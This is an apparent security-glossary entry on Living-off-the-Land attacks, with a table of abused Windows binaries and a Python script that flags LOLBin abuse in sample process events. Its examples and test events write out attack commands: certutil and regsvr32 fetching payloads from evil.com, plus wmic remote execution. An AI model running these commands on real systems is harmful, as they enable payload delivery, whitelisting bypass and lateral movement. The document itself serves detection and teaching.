Living-Off-The-Land-Lolbins
Tactics & Techniques
Definition
Living off the Land (LotL) refers to an attack approach where adversaries use tools and binaries already present on the target system rather than dropping their own malware. The binaries abused this way are called LOLBins or Legitimate Operating System Binaries. The logic is simple: if you use what's already there, you blend in. No custom malware to detect, no unknown binary to flag, no signature to write a rule against. The attack looks like normal system administration activity because, for the most part, it is exactly that, just pointed in the wrong direction. The attacker's entire toolkit might be `certutil.exe`, `powershell.exe`, and `wmic.exe`, all signed by Microsoft, all expected to run on any Windows machine.

### Common LOLBins and What Attackers Do With Them

| Binary | Legitimate Purpose | How Attackers Abuse It |
|---|---|---|
| `certutil.exe` | Certificate management | Download files, decode base64 payloads |
| `powershell.exe` | Scripting and automation | Execute encoded commands, download stagers, run in-memory payloads |
| `wmic.exe` | WMI management | Remote execution, process creation, persistence |
| `mshta.exe` | Run HTA applications | Execute malicious scripts hosted remotely |
| `rundll32.exe` | Run DLL files | Load and execute malicious DLLs |
| `regsvr32.exe` | Register COM objects | Execute remote scriptlets, bypass AppLocker |
| `msiexec.exe` | Install MSI packages | Download and execute remote MSI payloads |
| `bitsadmin.exe` | Background transfer jobs | Download malicious files, establish persistence |
| `cmd.exe` | Command line interpreter | Chain commands, run scripts, enumerate the environment |
| `schtasks.exe` | Manage scheduled tasks | Create persistence, trigger payload execution |

This is not a complete list. The [LOLBAS Project](https://lolbas-project.github.io/) maintains a full catalog of documented binaries, scripts, and libraries with known abuse cases.
Examples & Use Cases
**Certutil file download** — An attacker uses `certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Temp\payload.exe` to pull a second-stage implant. No custom downloader needed. A signed Windows binary did the job.

**Encoded PowerShell stager** — A phishing macro executes a base64-encoded PowerShell command that downloads and runs a Cobalt Strike beacon entirely in memory. Nothing written to disk, no unsigned binary, no AV alert.

**Regsvr32 AppLocker bypass** — An attacker uses `regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll` to execute a remote scriptlet and bypass application whitelisting controls. A documented technique since 2016. Still works in many environments today.

**WMIC lateral movement** — An attacker uses `wmic.exe` to remotely create a process on another host in the network: `wmic /node:192.168.1.50 process call create "cmd.exe /c whoami"`. No PSExec, no custom tool. Built-in Windows management utility used as a pivot mechanism.

**APT41 and FIN7** — Both groups have been extensively documented using LOLBin techniques including PowerShell, MSHTA, and Rundll32 as primary execution methods across multiple campaigns, deliberately avoiding custom malware to reduce detection surface.

### Further Reading

- [LOLBAS Project — Full Binary Catalog](https://lolbas-project.github.io/)
- [MITRE ATT&CK — T1218 System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/)
- [SANS — Detecting LOLBins](https://www.sans.org/blog/defense-spotlight-finding-evil-in-windows-10-prefetch-files/)
- [Red Canary — LOLBins Threat Report](https://redcanary.com/threat-detection-report/techniques/windows-command-shell/)
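A detection pass over process-creation telemetry for the command lines shown in the examples above, added here as an illustration for this entry (not the site's own code): Sysmon-style Event ID 1 records, constructed inline, run through per-binary command-line rules plus an Office-parent check, while legitimate uses of the same binaries stay unflagged. The field names follow Sysmon; the sample events, the `evil.com` hosts and the base64 blob are placeholders.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (Event ID 1 fields), not real telemetry.
# Two benign entries use the same binaries legitimately and must not be flagged.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Temp\payload.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -store my"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic /node:192.168.1.50 process call create "cmd.exe /c whoami"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},  # placeholder blob
]

# Command-line patterns per LOLBin, keyed by lowercase image basename.
RULES = {
    "certutil.exe": [(re.compile(r"-urlcache|-decode", re.I), "certutil download or base64 decode")],
    "regsvr32.exe": [(re.compile(r"/i:\s*https?://", re.I), "regsvr32 loading a remote scriptlet")],
    "mshta.exe": [(re.compile(r"https?://", re.I), "mshta running a remotely hosted script")],
    "wmic.exe": [(re.compile(r"/node:\S+.*process\s+call\s+create", re.I), "wmic remote process creation")],
    "powershell.exe": [(re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
                        "encoded PowerShell command")],
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def detect(event):
    """Return the reasons this event looks like LOLBin abuse; an empty list means no finding."""
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    reasons = [why for pattern, why in RULES.get(image, []) if pattern.search(event["CommandLine"])]
    if image in RULES and parent in OFFICE_PARENTS:  # macro-launched LOLBin, regardless of arguments
        reasons.append(f"{image} spawned by Office process {parent}")
    return reasons

def scan(events):
    """Run detect() over a batch; returns (image basename, reasons) for each event with a finding."""
    hits = [(PureWindowsPath(e["Image"]).name.lower(), detect(e)) for e in events]
    return [h for h in hits if h[1]]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(f"{image}: {'; '.join(reasons)}")
```

The parent-process check fires even when the command line carries no known pattern, which is what catches the macro-launched stager case where the arguments are obfuscated.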